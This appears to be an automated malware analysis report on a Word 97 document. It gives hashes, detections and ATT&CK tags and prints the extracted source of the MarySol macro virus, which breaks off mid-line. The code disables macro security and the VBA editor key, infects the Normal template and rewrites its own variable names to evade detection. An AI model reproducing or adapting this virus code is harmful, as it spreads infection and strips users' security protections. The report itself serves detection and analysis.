Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 46aa9209dd250f98…

MALICIOUS

Office (OLE)

43.5 KB Created: 1999-12-13 14:17:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 077f7b5cdbb24f7d1bf025669957d66f SHA-1: 47d69210881d9c6f576c9f2c48311274c5020ef7 SHA-256: 46aa9209dd250f9853b115e53a70bbe1fbfd5172b37a48526833faa366ed596d
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro. This macro attempts to lower macro security settings by writing to the registry key HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level. The presence of the 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Mary-2' ClamAV detections strongly suggests malicious intent, likely to download and execute further payloads or perform other malicious actions.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20286 bytes
SHA-256: 3f766892a2dd860bb523b5475bc32f5c7919df3fcd4f825f5ec4d355b33bb34a
Detection
ClamAV: Doc.Trojan.Mary-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Word97.MarySol v1.2
'(c) 1999 cry0tek

Private Sub Document_Open()
'MarySol
On Error Resume Next
Dim varray(1 To 14) As String
Dim Wt4Kg7Bj8Mu2Zx1Ih6Xt1 As Long: Dim Kn7Qv0Rf8Wv1Uk3Ie6Aj4La6 As Long: Dim Xq4Aq6Yb2Zg1Xt7Ar6Lc7Hq5Ay5 As Long: Dim Ia4Dr7Jb2Bm7Pz6Zf0In2Jk9Me6 As Long
If Left(Application.Version, 1) > 9 Then
 CommandBars("Macro").Controls("Security...").Delete
 System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
 Options.VirusProtection = (1 - 1)
End If
FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
Options.SaveNormalPrompt = (1 - 1): Options.ConfirmConversions = (1 - 1): Application.EnableCancelKey = (1 - 1)
Application.ScreenUpdating = (1 - 1): Application.ShowVisualBasicEditor = (1 - 1)
If System.OperatingSystem = "Windows" And System.LanguageDesignation = "English (United States)" Then
 Xt0Je2Bv5Gg6Rm9Ix0Ot4Yr9Rg6Aq1 = GetAttr(NormalTemplate.FullName)
 If Xt0Je2Bv5Gg6Rm9Ix0Ot4Yr9Rg6Aq1 = vbReadOnly Then GoTo Yd3Ol3Hn6Sg8Kd1Lp8Ti1Kq8Lw7
 If Xt0Je2Bv5Gg6Rm9Ix0Ot4Yr9Rg6Aq1 = vbReadOnly + vbArchive Then GoTo Yd3Ol3Hn6Sg8Kd1Lp8Ti1Kq8Lw7
End If
Set Br6Jk8Hk1Nv4Ea8Rs4Tg8 = ActiveDocument.VBProject.VBComponents.Item(1).Codemodule
Set Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3 = NormalTemplate.VBProject.VBComponents.Item(1).Codemodule
If Br6Jk8Hk1Nv4Ea8Rs4Tg8.Lines(5, 1) <> "'MarySol" Then
 Br6Jk8Hk1Nv4Ea8Rs4Tg8.DeleteLines 1, _
 Br6Jk8Hk1Nv4Ea8Rs4Tg8.CountOfLines
 Br6Jk8Hk1Nv4Ea8Rs4Tg8.InsertLines 1, Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3.Lines _
 (1, Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3.CountOfLines)
 Br6Jk8Hk1Nv4Ea8Rs4Tg8.ReplaceLine 4, Chr(80) + Chr(114) + Chr(105) + Chr(118) + Chr(97) + Chr(116) + Chr(101) + Chr(32) + _
 Chr(83) + Chr(117) + Chr(98) + Chr(32) + Chr(68) + Chr(111) + Chr(99) + Chr(117) + Chr(109) + Chr(101) + _
 Chr(110) + Chr(116) + Chr(95) + Chr(79) + Chr(112) + Chr(101) + Chr(110) + Chr(40) + Chr(41)
End If
If Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3.Lines(5, 1) <> "'MarySol" Then
 Randomize
 varray(1) = "Xt0Je2Bv5Gg6Rm9Ix0Ot4Yr9Rg6Aq1": varray(2) = "Br6Jk8Hk1Nv4Ea8Rs4Tg8": varray(3) = "Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3": varray(4) = "Wt4Kg7Bj8Mu2Zx1Ih6Xt1": varray(5) = "Kn7Qv0Rf8Wv1Uk3Ie6Aj4La6": varray(6) = "Xq4Aq6Yb2Zg1Xt7Ar6Lc7Hq5Ay5": varray(7) = "Ia4Dr7Jb2Bm7Pz6Zf0In2Jk9Me6"
 varray(8) = "Yd3Ol3Hn6Sg8Kd1Lp8Ti1Kq8Lw7": varray(9) = "Fm8": varray(10) = "Kr4Tl5Yk8Fe9": varray(11) = "Lh7Tu1Ki7Qc1": varray(12) = "Ir5Qc8Lq0Oc0Fv9Dc2St9Fi1Iq7": varray(13) = "Wv2Ln0Ai5Uz9Nv1Bd8": varray(14) = "Ku0Yj6"
 For i = 1 To 14
  For j = 1 To Int((10 * Rnd) + 1)
   PolyVal = PolyVal + Chr(65 + Int(Rnd * 26)) & Chr(122 - Int(Rnd * 26)) & Chr(48 + Int(Rnd * 10))
  Next j
  With Br6Jk8Hk1Nv4Ea8Rs4Tg8
   Wt4Kg7Bj8Mu2Zx1Ih6Xt1 = 1: Kn7Qv0Rf8Wv1Uk3Ie6Aj4La6 = 1: Xq4Aq6Yb2Zg1Xt7Ar6Lc7Hq5Ay5 = .CountOfLines: Ia4Dr7Jb2Bm7Pz6Zf0In2Jk9Me6 = Len(.Lines(.CountOfLines, 1))
   Do While .Find(varray(i), Wt4Kg7Bj8Mu2Zx1Ih6Xt1, Kn7Qv0Rf8Wv1Uk3Ie6Aj4La6, Xq4Aq6Yb2Zg1Xt7Ar6Lc7Hq5Ay5, Ia4Dr7Jb2Bm7Pz6Zf0In2Jk9Me6, True)
    strVal = .Lines(Wt4Kg7Bj8Mu2Zx1Ih6Xt1, 1)
    strVal = Left(strVal, Kn7Qv0Rf8Wv1Uk3Ie6Aj4La6 - 1) & PolyVal & Mid(strVal, Ia4Dr7Jb2Bm7Pz6Zf0In2Jk9Me6)
    .ReplaceLine Wt4Kg7Bj8Mu2Zx1Ih6Xt1, strVal
    Wt4Kg7Bj8Mu2Zx1Ih6Xt1 = Xq4Aq6Yb2Zg1Xt7Ar6Lc7Hq5Ay5 + 1: Kn7Qv0Rf8Wv1Uk3Ie6Aj4La6 = 1
    Xq4Aq6Yb2Zg1Xt7Ar6Lc7Hq5Ay5 = .CountOfLines: Ia4Dr7Jb2Bm7Pz6Zf0In2Jk9Me6 = Len(.Lines(.CountOfLines, 1))
   Loop
  End With
  PolyVal = ""
 Next i
 Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3.DeleteLines 1, _
 Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3.CountOfLines
 Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3.InsertLines 1, Br6Jk8Hk1Nv4Ea8Rs4Tg8.Lines _
 (1, Br6Jk8Hk1Nv4Ea8Rs4Tg8.CountOfLines)
 Qj6Zf5Dl7Zr5Bv5Vi5Jt0Mx3Ch7Xh3.ReplaceLine 4, Chr(80) + Chr(114) + Chr(105) + Chr(118) + Chr(97) + Chr(116) + Chr(101) + Chr(32) + _
 Chr
... (truncated)